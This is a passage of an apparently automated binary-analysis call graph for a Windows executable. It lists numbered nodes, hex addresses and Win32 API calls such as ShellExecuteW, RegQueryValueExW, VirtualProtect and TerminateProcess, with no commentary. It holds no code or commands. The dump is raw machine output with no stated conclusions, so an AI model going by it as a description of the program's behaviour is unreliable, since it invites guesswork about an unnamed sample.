96901 5ff2d9 20 API calls _free 96895->96901 96898 5fe47d 96902 6027ec 26 API calls pre_c_initialization 96898->96902 96899->96892 96901->96898 96902->96899 96903->96899 96905 5d6d34 96904->96905 96906 5d6d91 96904->96906 96905->96906 96908 5d6d3f 96905->96908 96907 5d93b2 22 API calls 96906->96907 96909 5d6d62 __fread_nolock 96907->96909 96910 5d6d5a 96908->96910 96911 614c9d 96908->96911 96909->96573 96928 5d6f34 22 API calls 96910->96928 96912 5efddb 22 API calls 96911->96912 96914 614ca7 96912->96914 96915 5efe0b 22 API calls 96914->96915 96916 614cda 96915->96916 96918 5d93c9 __fread_nolock 96917->96918 96919 5d93c0 96917->96919 96918->96564 96919->96918 96920 5daec9 22 API calls 96919->96920 96920->96918 96922 5da6dd 96921->96922 96923 5da6d0 96921->96923 96924 5efddb 22 API calls 96922->96924 96923->96565 96925 5da6e7 96924->96925 96926 5efe0b 22 API calls 96925->96926 96926->96923 96927->96586 96928->96909 96930 5d6382 96929->96930 96936 5d63b6 __fread_nolock 96929->96936 96931 614a82 96930->96931 96932 5d63a9 96930->96932 96930->96936 96933 5efddb 22 API calls 96931->96933 96934 5da587 22 API calls 96932->96934 96935 614a91 96933->96935 96934->96936 96937 5efe0b 22 API calls 96935->96937 96936->96597 96938 614ac5 __fread_nolock 96937->96938 96939->96598 96940->96640 96941->96642 96942->96692 96944 5fdbc1 96943->96944 96950 5fdbdd 96943->96950 96945 5fdbcd 96944->96945 96946 5fdbe3 96944->96946 96944->96950 96980 5ff2d9 20 API calls _free 96945->96980 96977 5fd9cc 96946->96977 96949 5fdbd2 96981 6027ec 26 API calls pre_c_initialization 96949->96981 96950->96695 96953 5fe684 __FrameHandler3::FrameUnwindToState 96952->96953 96954 5fe6aa 96953->96954 96955 5fe695 96953->96955 96964 5fe6a5 __wsopen_s 96954->96964 97137 5f918d EnterCriticalSection 96954->97137 97154 5ff2d9 20 API calls _free 96955->97154 96957 5fe69a 97155 6027ec 26 API calls pre_c_initialization 96957->97155 96959 5fe6c6 97138 5fe602 96959->97138 96962 5fe6d1 97156 5fe6ee LeaveCriticalSection __fread_nolock 96962->97156 96964->96696 96966 643013 96965->96966 96967 642fff SetFileTime CloseHandle 96965->96967 96966->96674 96967->96966 96972 642e7a 96968->96972 96969 5d50f5 40 API calls 96969->96972 96970 6428fe 27 API calls 96970->96972 96971 6429c4 96971->96674 96974 5fd583 26 API calls 96971->96974 96972->96969 96972->96970 96972->96971 96973 5d511f 64 API calls 96972->96973 96973->96972 96974->96675 96975->96683 96976->96708 96982 5fd97b 96977->96982 96979 5fd9f0 96979->96950 96980->96949 96981->96950 96983 5fd987 __FrameHandler3::FrameUnwindToState 96982->96983 96990 5f918d EnterCriticalSection 96983->96990 96985 5fd995 96991 5fd9f4 96985->96991 96989 5fd9b3 __wsopen_s 96989->96979 96990->96985 96999 6049a1 96991->96999 96997 5fd9a2 96998 5fd9c0 LeaveCriticalSection __fread_nolock 96997->96998 96998->96989 97020 5fd955 96999->97020 97001 6049b0 97027 60f89b 97001->97027 97003 6049b6 97007 5fda09 97003->97007 97036 603820 21 API calls _free 97003->97036 97005 604a15 97006 6029c8 _free 20 API calls 97005->97006 97006->97007 97008 5fda3a 97007->97008 97011 5fda4c 97008->97011 97014 5fda24 97008->97014 97009 5fda5a 97067 5ff2d9 20 API calls _free 97009->97067 97011->97009 97011->97014 97017 5fda85 __fread_nolock 97011->97017 97012 5fda5f 97068 6027ec 26 API calls pre_c_initialization 97012->97068 97019 604a56 62 API calls 97014->97019 97016 5fd955 __fread_nolock 26 API calls 97016->97017 97017->97014 97017->97016 97042 6059be 97017->97042 97069 5fdc0b 97017->97069 97019->96997 97021 5fd976 97020->97021 97022 5fd961 97020->97022 97021->97001 97037 5ff2d9 20 API calls _free 97022->97037 97024 5fd966 97038 6027ec 26 API calls pre_c_initialization 97024->97038 97026 5fd971 97026->97001 97028 60f8a8 97027->97028 97029 60f8b5 97027->97029 97039 5ff2d9 20 API calls _free 97028->97039 97031 60f8c1 97029->97031 97040 5ff2d9 20 API calls _free 97029->97040 97031->97003 97033 60f8ad 97033->97003 97034 60f8e2 97041 6027ec 26 API calls pre_c_initialization 97034->97041 97036->97005 97037->97024 97038->97026 97039->97033 97040->97034 97041->97033 97043 6059ca __FrameHandler3::FrameUnwindToState 97042->97043 97044 6059d2 97043->97044 97045 6059ea 97043->97045 97129 5ff2c6 20 API calls _free 97044->97129 97047 605a88 97045->97047 97051 605a1f 97045->97051 97134 5ff2c6 20 API calls _free 97047->97134 97048 6059d7 97130 5ff2d9 20 API calls _free 97048->97130 97075 605147 EnterCriticalSection 97051->97075 97052 605a8d 97135 5ff2d9 20 API calls _free 97052->97135 97053 6059df __wsopen_s 97053->97017 97056 605a25 97058 605a41 97056->97058 97059 605a56 97056->97059 97057 605a95 97136 6027ec 26 API calls pre_c_initialization 97057->97136 97131 5ff2d9 20 API calls _free 97058->97131 97076 605aa9 97059->97076 97063 605a46 97132 5ff2c6 20 API calls _free 97063->97132 97064 605a51 97133 605a80 LeaveCriticalSection __wsopen_s 97064->97133 97067->97012 97068->97014 97070 5fdc23 97069->97070 97074 5fdc1f 97069->97074 97071 5fd955 __fread_nolock 26 API calls 97070->97071 97070->97074 97072 5fdc43 97071->97072 97073 6059be __wsopen_s 62 API calls 97072->97073 97073->97074 97074->97017 97075->97056 97077 605ad7 97076->97077 97115 605ad0 97076->97115 97078 605afa 97077->97078 97079 605adb 97077->97079 97083 605b4b 97078->97083 97084 605b2e 97078->97084 97080 5ff2c6 __dosmaperr 20 API calls 97079->97080 97082 605ae0 97080->97082 97081 5f0a8c _ValidateLocalCookies 5 API calls 97085 605cb1 97081->97085 97086 5ff2d9 _free 20 API calls 97082->97086 97087 605b61 97083->97087 97090 609424 __wsopen_s 28 API calls 97083->97090 97088 5ff2c6 __dosmaperr 20 API calls 97084->97088 97085->97064 97089 605ae7 97086->97089 97091 60564e __wsopen_s 39 API calls 97087->97091 97092 605b33 97088->97092 97093 6027ec pre_c_initialization 26 API calls 97089->97093 97090->97087 97094 605b6a 97091->97094 97095 5ff2d9 _free 20 API calls 97092->97095 97093->97115 97096 605ba8 97094->97096 97097 605b6f 97094->97097 97098 605b3b 97095->97098 97099 605c02 WriteFile 97096->97099 97100 605bbc 97096->97100 97101 605b73 97097->97101 97102 605b95 97097->97102 97103 6027ec pre_c_initialization 26 API calls 97098->97103 97107 605c25 GetLastError 97099->97107 97109 605b8b 97099->97109 97104 605bf2 97100->97104 97105 605bc4 97100->97105 97106 605c69 97101->97106 97112 6055e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 97101->97112 97108 60542e __wsopen_s 45 API calls 97102->97108 97103->97115 97113 6056c4 __wsopen_s 7 API calls 97104->97113 97110 605be2 97105->97110 97111 605bc9 97105->97111 97114 5ff2d9 _free 20 API calls 97106->97114 97106->97115 97107->97109 97108->97109 97109->97106 97109->97115 97120 605c45 97109->97120 97117 605891 __wsopen_s 8 API calls 97110->97117 97111->97106 97116 605bd2 97111->97116 97112->97109 97118 605be0 97113->97118 97119 605c8e 97114->97119 97115->97081 97121 6057a3 __wsopen_s 7 API calls 97116->97121 97117->97118 97118->97109 97122 5ff2c6 __dosmaperr 20 API calls 97119->97122 97123 605c60 97120->97123 97124 605c4c 97120->97124 97121->97118 97122->97115 97126 5ff2a3 __dosmaperr 20 API calls 97123->97126 97125 5ff2d9 _free 20 API calls 97124->97125 97127 605c51 97125->97127 97126->97115 97128 5ff2c6 __dosmaperr 20 API calls 97127->97128 97128->97115 97129->97048 97130->97053 97131->97063 97132->97064 97133->97053 97134->97052 97135->97057 97136->97053 97137->96959 97139 5fe60f 97138->97139 97141 5fe624 97138->97141 97176 5ff2d9 20 API calls _free 97139->97176 97142 5fdc0b 62 API calls 97141->97142 97147 5fe61f 97141->97147 97144 5fe638 97142->97144 97143 5fe614 97177 6027ec 26 API calls pre_c_initialization 97143->97177 97157 604d7a 97144->97157 97147->96962 97149 5fd955 __fread_nolock 26 API calls 97150 5fe646 97149->97150 97161 60862f 97150->97161 97153 6029c8 _free 20 API calls 97153->97147 97154->96957 97155->96964 97156->96964 97158 604d90 97157->97158 97159 5fe640 97157->97159 97158->97159 97160 6029c8 _free 20 API calls 97158->97160 97159->97149 97160->97159 97162 60863e 97161->97162 97166 608653 97161->97166 97181 5ff2c6 20 API calls _free 97162->97181 97164 60868e 97183 5ff2c6 20 API calls _free 97164->97183 97165 608643 97182 5ff2d9 20 API calls _free 97165->97182 97166->97164 97169 60867a 97166->97169 97178 608607 97169->97178 97170 608693 97184 5ff2d9 20 API calls _free 97170->97184 97173 60869b 97185 6027ec 26 API calls pre_c_initialization 97173->97185 97174 5fe64c 97174->97147 97174->97153 97176->97143 97177->97147 97186 608585 97178->97186 97180 60862b 97180->97174 97181->97165 97182->97174 97183->97170 97184->97173 97185->97174 97187 608591 __FrameHandler3::FrameUnwindToState 97186->97187 97197 605147 EnterCriticalSection 97187->97197 97189 60859f 97190 6085d1 97189->97190 97191 6085c6 97189->97191 97198 5ff2d9 20 API calls _free 97190->97198 97192 6086ae __wsopen_s 29 API calls 97191->97192 97194 6085cc 97192->97194 97199 6085fb LeaveCriticalSection __wsopen_s 97194->97199 97196 6085ee __wsopen_s 97196->97180 97197->97189 97198->97194 97199->97196 97201 5d33fe _wcslen 97200->97201 97202 61311d 97201->97202 97203 5d3411 97201->97203 97204 5efddb 22 API calls 97202->97204 97205 5da587 22 API calls 97203->97205 97206 613127 97204->97206 97207 5d341e __fread_nolock 97205->97207 97208 5efe0b 22 API calls 97206->97208 97207->96716 97209 613157 __fread_nolock 97208->97209 97210->96731 97212 63d4d5 97211->97212 97213 63dbdc GetFileAttributesW 97211->97213 97212->96142 97213->97212 97214 63dbe8 FindFirstFileW 97213->97214 97214->97212 97215 63dbf9 FindClose 97214->97215 97215->97212 97217 5d7510 53 API calls 97216->97217 97218 657f90 97217->97218 97240 657fd5 ISource 97218->97240 97254 658cd3 97218->97254 97220 658281 97221 65844f 97220->97221 97225 65828f 97220->97225 97294 658ee4 60 API calls 97221->97294 97224 65845e 97224->97225 97226 65846a 97224->97226 97267 657e86 97225->97267 97226->97240 97227 5d7510 53 API calls 97245 658049 97227->97245 97232 6582c8 97282 5efc70 97232->97282 97235 658302 97289 5d63eb 22 API calls 97235->97289 97236 6582e8 97288 64359c 82 API calls __wsopen_s 97236->97288 97239 658311 97290 5d6a50 22 API calls 97239->97290 97240->96403 97241 6582f3 GetCurrentProcess TerminateProcess 97241->97235 97243 65832a 97253 658352 97243->97253 97291 5e04f0 22 API calls 97243->97291 97245->97220 97245->97227 97245->97240 97286 63417d 22 API calls __fread_nolock 97245->97286 97287 65851d 42 API calls _strftime 97245->97287 97246 6584c5 97246->97240 97248 6584d9 FreeLibrary 97246->97248 97247 658341 97292 658b7b 75 API calls 97247->97292 97248->97240 97252 5daceb 23 API calls 97252->97253 97253->97246 97253->97252 97293 5e04f0 22 API calls 97253->97293 97295 658b7b 75 API calls 97253->97295 97255 5daec9 22 API calls 97254->97255 97256 658cee CharLowerBuffW 97255->97256 97296 638e54 97256->97296 97260 5da961 22 API calls 97261 658d2a 97260->97261 97262 5d6d25 22 API calls 97261->97262 97263 658d3e 97262->97263 97264 5d93b2 22 API calls 97263->97264 97266 658d48 _wcslen 97264->97266 97265 658e5e _wcslen 97265->97245 97266->97265 97303 65851d 42 API calls _strftime 97266->97303 97268 657ea1 97267->97268 97269 657eec 97267->97269 97270 5efe0b 22 API calls 97268->97270 97273 659096 97269->97273 97271 657ec3 97270->97271 97271->97269 97272 5efddb 22 API calls 97271->97272 97272->97271 97274 6592ab ISource 97273->97274 97281 6590ba _strcat _wcslen 97273->97281 97274->97232 97275 5db567 39 API calls 97275->97281 97276 5db38f 39 API calls 97276->97281 97277 5db6b5 39 API calls 97277->97281 97278 5d7510 53 API calls 97278->97281 97279 5fea0c 21 API calls ___std_exception_copy 97279->97281 97281->97274 97281->97275 97281->97276 97281->97277 97281->97278 97281->97279 97306 63efae 24 API calls _wcslen 97281->97306 97283 5efc85 97282->97283 97284 5efd1d VirtualProtect 97283->97284 97285 5efceb 97283->97285 97284->97285 97285->97235 97285->97236 97286->97245 97287->97245 97288->97241 97289->97239 97290->97243 97291->97247 97292->97253 97293->97253 97294->97224 97295->97253 97297 638e74 _wcslen 97296->97297 97298 638f63 97297->97298 97301 638ea9 97297->97301 97302 638f68 97297->97302 97298->97260 97298->97266 97301->97298 97304 5ece60 41 API calls 97301->97304 97302->97298 97305 5ece60 41 API calls 97302->97305 97303->97265 97304->97301 97305->97302 97306->97281 97307->96425 97309 5dae01 97308->97309 97312 5dae1c ISource 97308->97312 97310 5daec9 22 API calls 97309->97310 97311 5dae09 CharUpperBuffW 97310->97311 97311->97312 97312->96159 97314 5dacae 97313->97314 97315 5dacd1 97314->97315 97350 64359c 82 API calls __wsopen_s 97314->97350 97315->96185 97318 61fadb 97317->97318 97319 5dad92 97317->97319 97320 5efddb 22 API calls 97319->97320 97321 5dad99 97320->97321 97351 5dadcd 97321->97351 97325 61f86f 97324->97325 97328 5da718 97324->97328 97326 61f87f 97325->97326 97370 634d4a 22 API calls ISource 97325->97370 97329 5da746 97328->97329 97334 5da763 ISource 97328->97334 97358 5daf8a 97328->97358 97331 5da74c 97329->97331 97332 5daf8a 22 API calls 97329->97332 97331->97334 97366 5db090 97331->97366 97332->97331 97334->96187 97335->96187 97336->96164 97337->96197 97338->96178 97339->96197 97340->96197 97341->96185 97342->96185 97343->96185 97344->96185 97345->96185 97346->96193 97347->96197 97348->96202 97349->96197 97350->97315 97354 5daddd 97351->97354 97352 5dadb6 97352->96185 97353 5efddb 22 API calls 97353->97354 97354->97352 97354->97353 97355 5da961 22 API calls 97354->97355 97356 5da8c7 22 API calls 97354->97356 97357 5dadcd 22 API calls 97354->97357 97355->97354 97356->97354 97357->97354 97359 5daf98 97358->97359 97365 5dafc0 ISource 97358->97365 97360 5dafa6 97359->97360 97361 5daf8a 22 API calls 97359->97361 97362 5dafac 97360->97362 97363 5daf8a 22 API calls 97360->97363 97361->97360 97364 5db090 22 API calls 97362->97364 97362->97365 97363->97362 97364->97365 97365->97329 97368 5db09b ISource 97366->97368 97367 5db0d6 ISource 97367->97334 97368->97367 97371 5ece17 22 API calls ISource 97368->97371 97370->97326 97371->97367 97372->96237 97373->96237 97374->96234 97375->96234 97376->96238 97377->96234 97378 5df7bf 97379 5dfcb6 97378->97379 97380 5df7d3 97378->97380 97382 5daceb 23 API calls 97379->97382 97381 5dfcc2 97380->97381 97383 5efddb 22 API calls 97380->97383 97384 5daceb 23 API calls 97381->97384 97382->97381 97385 5df7e5 97383->97385 97387 5dfd3d 97384->97387 97385->97381 97386 5df83e 97385->97386 97385->97387 97389 5e1310 235 API calls 97386->97389 97404 5ded9d ISource 97386->97404 97415 641155 22 API calls 97387->97415 97410 5dec76 ISource 97389->97410 97391 5dfef7 97399 5da8c7 22 API calls 97391->97399 97391->97404 97393 5efddb 22 API calls 97393->97410 97394 624b0b 97417 64359c 82 API calls __wsopen_s 97394->97417 97395 5da8c7 22 API calls 97395->97410 97396 624600 97402 5da8c7 22 API calls 97396->97402 97396->97404 97399->97404 97401 5f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97401->97410 97402->97404 97403 5dfbe3 97403->97404 97406 624bdc 97403->97406 97412 5df3ae ISource 97403->97412 97405 5da961 22 API calls 97405->97410 97418 64359c 82 API calls __wsopen_s 97406->97418 97408 624beb 97419 64359c 82 API calls __wsopen_s 97408->97419 97409 5f00a3 29 API calls pre_c_initialization 97409->97410 97410->97391 97410->97393 97410->97394 97410->97395 97410->97396 97410->97401 97410->97403 97410->97404 97410->97405 97410->97408 97410->97409 97411 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97410->97411 97410->97412 97413 5e01e0 235 API calls 2 library calls 97410->97413 97414 5e06a0 41 API calls ISource 97410->97414 97411->97410 97412->97404 97416 64359c 82 API calls __wsopen_s 97412->97416 97413->97410 97414->97410 97415->97404 97416->97404 97417->97404 97418->97408 97419->97404 97420 623a41 97424 6410c0 97420->97424 97422 623a4c 97423 6410c0 53 API calls 97422->97423 97423->97422 97425 6410fa 97424->97425 97430 6410cd 97424->97430 97425->97422 97426 6410fc 97436 5efa11 53 API calls 97426->97436 97428 641101 97429 5d7510 53 API calls 97428->97429 97431 641108 97429->97431 97430->97425 97430->97426 97430->97428 97433 6410f4 97430->97433 97432 5d6350 22 API calls 97431->97432 97432->97425 97435 5db270 39 API calls 97433->97435 97435->97425 97436->97428 97437 5f03fb 97438 5f0407 __FrameHandler3::FrameUnwindToState 97437->97438 97466 5efeb1 97438->97466 97440 5f040e 97441 5f0561 97440->97441 97444 5f0438 97440->97444 97493 5f083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97441->97493 97443 5f0568 97494 5f4e52 28 API calls _abort 97443->97494 97455 5f0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97444->97455 97477 60247d 97444->97477 97446 5f056e 97495 5f4e04 28 API calls _abort 97446->97495 97450 5f0576 97451 5f0457 97453 5f04d8 97485 5f0959 97453->97485 97455->97453 97489 5f4e1a 38 API calls 3 library calls 97455->97489 97457 5f04de 97458 5f04f3 97457->97458 97490 5f0992 GetModuleHandleW 97458->97490 97460 5f04fa 97460->97443 97461 5f04fe 97460->97461 97462 5f0507 97461->97462 97491 5f4df5 28 API calls _abort 97461->97491 97492 5f0040 13 API calls 2 library calls 97462->97492 97465 5f050f 97465->97451 97467 5efeba 97466->97467 97496 5f0698 IsProcessorFeaturePresent 97467->97496 97469 5efec6 97497 5f2c94 10 API calls 3 library calls 97469->97497 97471 5efecb 97476 5efecf 97471->97476 97498 602317 97471->97498 97474 5efee6 97474->97440 97476->97440 97479 602494 97477->97479 97478 5f0a8c _ValidateLocalCookies 5 API calls 97480 5f0451 97478->97480 97479->97478 97480->97451 97481 602421 97480->97481 97482 602450 97481->97482 97483 5f0a8c _ValidateLocalCookies 5 API calls 97482->97483 97484 602479 97483->97484 97484->97455 97549 5f2340 97485->97549 97488 5f097f 97488->97457 97489->97453 97490->97460 97491->97462 97492->97465 97493->97443 97494->97446 97495->97450 97496->97469 97497->97471 97502 60d1f6 97498->97502 97501 5f2cbd 8 API calls 3 library calls 97501->97476 97505 60d213 97502->97505 97506 60d20f 97502->97506 97504 5efed8 97504->97474 97504->97501 97505->97506 97508 604bfb 97505->97508 97520 5f0a8c 97506->97520 97509 604c07 __FrameHandler3::FrameUnwindToState 97508->97509 97527 602f5e EnterCriticalSection 97509->97527 97511 604c0e 97528 6050af 97511->97528 97513 604c1d 97514 604c2c 97513->97514 97541 604a8f 29 API calls 97513->97541 97543 604c48 LeaveCriticalSection _abort 97514->97543 97517 604c27 97542 604b45 GetStdHandle GetFileType 97517->97542 97519 604c3d __wsopen_s 97519->97505 97521 5f0a97 IsProcessorFeaturePresent 97520->97521 97522 5f0a95 97520->97522 97524 5f0c5d 97521->97524 97522->97504 97548 5f0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97524->97548 97526 5f0d40 97526->97504 97527->97511 97529 6050bb __FrameHandler3::FrameUnwindToState 97528->97529 97530 6050c8 97529->97530 97531 6050df 97529->97531 97545 5ff2d9 20 API calls _free 97530->97545 97544 602f5e EnterCriticalSection 97531->97544 97534 6050cd 97546 6027ec 26 API calls pre_c_initialization 97534->97546 97535 6050eb 97538 605000 __wsopen_s 21 API calls 97535->97538 97540 605117 97535->97540 97538->97535 97539 6050d7 __wsopen_s 97539->97513 97547 60513e LeaveCriticalSection _abort 97540->97547 97541->97517 97542->97514 97543->97519 97544->97535 97545->97534 97546->97539 97547->97539 97548->97526 97550 5f096c GetStartupInfoW 97549->97550 97550->97488 97551 612ba5 97552 5d2b25 97551->97552 97553 612baf 97551->97553 97579 5d2b83 7 API calls 97552->97579 97594 5d3a5a 97553->97594 97557 612bb8 97558 5d9cb3 22 API calls 97557->97558 97560 612bc6 97558->97560 97562 612bf5 97560->97562 97563 612bce 97560->97563 97561 5d2b2f 97567 5d2b44 97561->97567 97583 5d3837 97561->97583 97565 5d33c6 22 API calls 97562->97565 97564 5d33c6 22 API calls 97563->97564 97568 612bd9 97564->97568 97569 612bf1 GetForegroundWindow ShellExecuteW 97565->97569 97570 5d2b5f 97567->97570 97593 5d30f2 Shell_NotifyIconW ___scrt_fastfail 97567->97593 97571 5d6350 22 API calls 97568->97571 97575 612c26 97569->97575 97576 5d2b66 SetCurrentDirectoryW 97570->97576 97574 612be7 97571->97574 97577 5d33c6 22 API calls 97574->97577 97575->97570 97578 5d2b7a 97576->97578 97577->97569 97601 5d2cd4 7 API calls 97579->97601 97581 5d2b2a 97582 5d2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97581->97582 97582->97561 97584 5d3862 ___scrt_fastfail 97583->97584 97602 5d4212 97584->97602 97587 5d38e8 97589 613386 Shell_NotifyIconW 97587->97589 97590 5d3906 Shell_NotifyIconW 97587->97590 97606 5d3923 97590->97606 97592 5d391c 97592->97567 97593->97570 97629 611f50 97594->97629 97597 5d9cb3 22 API calls 97598 5d3a8d 97597->97598 97631 5d3aa2 97598->97631 97600 5d3a97 97600->97557 97601->97581 97603 6135a4 97602->97603 97604 5d38b7 97602->97604 97603->97604 97605 6135ad DestroyIcon 97603->97605 97604->97587 97628 63c874 42 API calls _strftime 97604->97628 97605->97604 97607 5d393f 97606->97607 97608 5d3a13 97606->97608 97609 5d6270 22 API calls 97607->97609 97608->97592 97610 5d394d 97609->97610 97611 613393 LoadStringW 97610->97611 97612 5d395a 97610->97612 97614 6133ad 97611->97614 97613 5d6b57 22 API calls 97612->97613 97615 5d396f 97613->97615 97618 5da8c7 22 API calls 97614->97618 97622 5d3994 ___scrt_fastfail 97614->97622 97616 5d397c 97615->97616 97617 6133c9 97615->97617 97616->97614 97619 5d3986 97616->97619 97620 5d6350 22 API calls 97617->97620 97618->97622 97621 5d6350 22 API calls 97619->97621 97623 6133d7 97620->97623 97621->97622 97625 5d39f9 Shell_NotifyIconW 97622->97625 97623->97622 97624 5d33c6 22 API calls 97623->97624 97626 6133f9 97624->97626 97625->97608 97627 5d33c6 22 API calls 97626->97627 97627->97622 97628->97587 97630 5d3a67 GetModuleFileNameW 97629->97630 97630->97597 97632 611f50 __wsopen_s 97631->97632 97633 5d3aaf GetFullPathNameW 97632->97633 97634 5d3ace 97633->97634 97635 5d3ae9 97633->97635 97636 5d6b57 22 API calls 97634->97636 97637 5da6c3 22 API calls 97635->97637 97638 5d3ada 97636->97638 97637->97638 97641 5d37a0 97638->97641 97642 5d37ae 97641->97642 97643 5d93b2 22 API calls 97642->97643 97644 5d37c2 97643->97644 97644->97600 97645 5d1098 97650 5d42de 97645->97650 97649 5d10a7 97651 5da961 22 API calls 97650->97651 97652 5d42f5 GetVersionExW 97651->97652 97653 5d6b57 22 API calls 97652->97653 97654 5d4342 97653->97654 97655 5d93b2 22 API calls 97654->97655 97669 5d4378 97654->97669 97656 5d436c 97655->97656 97658 5d37a0 22 API calls 97656->97658 97657 5d441b GetCurrentProcess IsWow64Process 97659 5d4437 97657->97659 97658->97669 97660 5d444f LoadLibraryA 97659->97660 97661 613824 GetSystemInfo 97659->97661 97662 5d449c GetSystemInfo 97660->97662 97663 5d4460 GetProcAddress 97660->97663 97665 5d4476 97662->97665 97663->97662 97664 5d4470 GetNativeSystemInfo 97663->97664 97664->97665 97667 5d447a FreeLibrary 97665->97667 97668 5d109d 97665->97668 97666 6137df 97667->97668 97670 5f00a3 29 API calls __onexit 97668->97670 97669->97657 97669->97666 97670->97649 97671 5d105b 97676 5d344d 97671->97676 97673 5d106a 97707 5f00a3 29 API calls __onexit 97673->97707 97675 5d1074 97677 5d345d __wsopen_s 97676->97677 97678 5da961 22 API calls 97677->97678 97679 5d3513 97678->97679 97680 5d3a5a 24 API calls 97679->97680 97681 5d351c 97680->97681 97708 5d3357 97681->97708 97684 5d33c6 22 API calls 97685 5d3535 97684->97685 97714 5d515f 97685->97714 97688 5da961 22 API calls 97689 5d354d 97688->97689 97690 5da6c3 22 API calls 97689->97690 97691 5d3556 RegOpenKeyExW 97690->97691 97692 613176 RegQueryValueExW 97691->97692 97696 5d3578 97691->97696 97693 613193 97692->97693 97694 61320c RegCloseKey 97692->97694 97695 5efe0b 22 API calls 97693->97695 97694->97696 97706 61321e _wcslen 97694->97706 97697 6131ac 97695->97697 97696->97673 97698 5d5722 22 API calls 97697->97698 97699 6131b7 RegQueryValueExW 97698->97699 97700 6131d4 97699->97700 97703 6131ee ISource 97699->97703 97701 5d6b57 22 API calls 97700->97701 97701->97703 97702 5d4c6d 22 API calls 97702->97706 97703->97694 97704 5d9cb3 22 API calls 97704->97706 97705 5d515f 22 API calls 97705->97706 97706->97696 97706->97702 97706->97704 97706->97705 97707->97675 97709 611f50 __wsopen_s 97708->97709 97710 5d3364 GetFullPathNameW 97709->97710 97711 5d3386 97710->97711 97712 5d6b57 22 API calls 97711->97712 97713 5d33a4 97712->97713 97713->97684 97715 5d516e 97714->97715 97719 5d518f __fread_nolock 97714->97719 97718 5efe0b 22 API calls 97715->97718 97716 5efddb 22 API calls 97717 5d3544 97716->97717 97717->97688 97718->97719 97719->97716 97720 5d2e37 97721 5da961 22 API calls 97720->97721 97722 5d2e4d 97721->97722 97799 5d4ae3 97722->97799 97724 5d2e6b 97725 5d3a5a 24 API calls 97724->97725 97726 5d2e7f 97725->97726 97727 5d9cb3 22 API calls 97726->97727 97728 5d2e8c 97727->97728 97729 5d4ecb 94 API calls 97728->97729 97730 5d2ea5 97729->97730 97731 5d2ead 97730->97731 97732 612cb0 97730->97732 97735 5da8c7 22 API calls 97731->97735 97829 642cf9 97732->97829 97734 612cc3 97736 612ccf 97734->97736 97738 5d4f39 68 API calls 97734->97738 97737 5d2ec3 97735->97737 97740 5d4f39 68 API calls 97736->97740 97813 5d6f88 22 API calls 97737->97813 97738->97736 97742 612ce5 97740->97742 97741 5d2ecf 97743 5d9cb3 22 API calls 97741->97743 97855 5d3084 22 API calls 97742->97855 97744 5d2edc 97743->97744 97814 5da81b 41 API calls 97744->97814 97747 5d2eec 97749 5d9cb3 22 API calls 97747->97749 97748 612d02 97856 5d3084 22 API calls 97748->97856 97750 5d2f12 97749->97750 97815 5da81b 41 API calls 97750->97815 97753 612d1e 97754 5d3a5a 24 API calls 97753->97754 97755 612d44 97754->97755 97857 5d3084 22 API calls 97755->97857 97756 5d2f21 97759 5da961 22 API calls 97756->97759 97758 612d50 97760 5da8c7 22 API calls 97758->97760 97761 5d2f3f 97759->97761 97762 612d5e 97760->97762 97816 5d3084 22 API calls 97761->97816 97858 5d3084 22 API calls 97762->97858 97765 5d2f4b 97817 5f4a28 40 API calls 3 library calls 97765->97817 97766 612d6d 97770 5da8c7 22 API calls 97766->97770 97768 5d2f59 97768->97742 97769 5d2f63 97768->97769 97818 5f4a28 40 API calls 3 library calls 97769->97818 97773 612d83 97770->97773 97772 5d2f6e 97772->97748 97774 5d2f78 97772->97774 97859 5d3084 22 API calls 97773->97859 97819 5f4a28 40 API calls 3 library calls 97774->97819 97777 612d90 97778 5d2f83 97778->97753 97779 5d2f8d 97778->97779 97820 5f4a28 40 API calls 3 library calls 97779->97820 97781 5d2f98 97782 5d2fdc 97781->97782 97821 5d3084 22 API calls 97781->97821 97782->97766 97783 5d2fe8 97782->97783 97783->97777 97823 5d63eb 22 API calls 97783->97823 97786 5d2fbf 97788 5da8c7 22 API calls 97786->97788 97787 5d2ff8 97824 5d6a50 22 API calls 97787->97824 97790 5d2fcd 97788->97790 97822 5d3084 22 API calls 97790->97822 97791 5d3006 97825 5d70b0 23 API calls 97791->97825 97796 5d3021 97797 5d3065 97796->97797 97826 5d6f88 22 API calls 97796->97826 97827 5d70b0 23 API calls 97796->97827 97828 5d3084 22 API calls 97796->97828 97800 5d4af0 __wsopen_s 97799->97800 97801 5d6b57 22 API calls 97800->97801 97803 5d4b22 97800->97803 97801->97803 97802 5d4c6d 22 API calls 97802->97803 97803->97802 97809 5d4b58 97803->97809 97804 5d9cb3 22 API calls 97806 5d4c52 97804->97806 97805 5d9cb3 22 API calls 97805->97809 97808 5d515f 22 API calls 97806->97808 97807 5d4c6d 22 API calls 97807->97809 97811 5d4c5e 97808->97811 97809->97805 97809->97807 97810 5d515f 22 API calls 97809->97810 97812 5d4c29 97809->97812 97810->97809 97811->97724 97812->97804 97812->97811 97813->97741 97814->97747 97815->97756 97816->97765 97817->97768 97818->97772 97819->97778 97820->97781 97821->97786 97822->97782 97823->97787 97824->97791 97825->97796 97826->97796 97827->97796 97828->97796 97830 642d15 97829->97830 97831 5d511f 64 API calls 97830->97831 97832 642d29 97831->97832 97833 642e66 75 API calls 97832->97833 97834 642d3b 97833->97834 97835 5d50f5 40 API calls 97834->97835 97853 642d3f 97834->97853 97836 642d56 97835->97836 97837 5d50f5 40 API calls 97836->97837 97838 642d66 97837->97838 97839 5d50f5 40 API calls 97838->97839 97840 642d81 97839->97840 97841 5d50f5 40 API calls 97840->97841 97842 642d9c 97841->97842 97843 5d511f 64 API calls 97842->97843 97844 642db3 97843->97844 97845 5fea0c ___std_exception_copy 21 API calls 97844->97845 97846 642dba 97845->97846 97847 5fea0c ___std_exception_copy 21 API calls 97846->97847 97848 642dc4 97847->97848 97849 5d50f5 40 API calls 97848->97849 97850 642dd8 97849->97850 97851 6428fe 27 API calls 97850->97851 97852 642dee 97851->97852 97852->97853 97860 6422ce 79 API calls 97852->97860 97853->97734 97855->97748 